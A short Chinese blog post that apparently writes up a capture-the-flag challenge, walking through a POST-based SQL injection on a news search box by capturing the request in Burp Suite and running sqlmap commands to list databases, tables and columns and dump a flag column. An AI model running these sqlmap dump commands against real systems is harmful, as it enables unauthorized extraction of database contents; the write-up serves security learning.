sql注入之post注入

作者: 简言之_ | 来源:发表于2019-08-08 21:48 被阅读4次
题目信息:
image.png
工具:bp,SQLmap
知识点:sql注入之post注入

打开题目,有一处搜索框,搜索新闻。考虑SQL注入。


image.png 随便输入一个2,用bp抓包,发现是post方式,然后Copy to file,将报文保存为txt文件。 image.png
保存为123.txt image.png
然后用sqlmap一键注入(-r 表示从一个文件中载入HTTP请求,123.txt如果没有放到sqlmap目录就用绝对路径)

0x01:查找数据库
python sqlmap.py -r D:\SQLmap\123.txt --dbs

image.png

0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news

image.png

0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table

image.png

0x04:显示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g

image.png
参考:sqlmap用于sql注入语法

相关文章

  • sql注入之post注入

    题目信息: 打开题目,有一处搜索框,搜索新闻。考虑SQL注入。 0x01:查找数据库python sqlmap.p...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

  • web安全之SQL注入

    2018/07/06 23:41 慕课网web安全之SQ之注入课程学习笔记 什么是SQL注入? 如何寻找SQL注入...

  • SQL注入

    SQL分类: 按照数据类型分类:>整形注入>字符型注入 按照注入语法分类 按照数据提交方式分类> post> ge...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 谈谈sql注入之原理和防护(-)

    谈谈sql注入(二)谈谈sql注入(三)谈谈sql注入(四)所谓SQL注入,就是通过把SQL命令插入到Web表单提...

  • 谈谈sql注入之语句构造手法(二)

    谈谈sql注入(一)谈谈sql注入(三)谈谈sql注入(四)SQL注入的手法相当灵活,在注入的时候会碰到很多意外的...

  • DWVA手把手教程(四)——SQL注入(Post)

    前言 一开始让我写Post方法实现Sql注入我是拒绝的 可是无奈之前已经许诺过了 虽然post方法注入相对简单 但...

网友评论

    本文标题:sql注入之post注入

    本文链接:https://www.haomeiwen.com/subject/akofjctx.html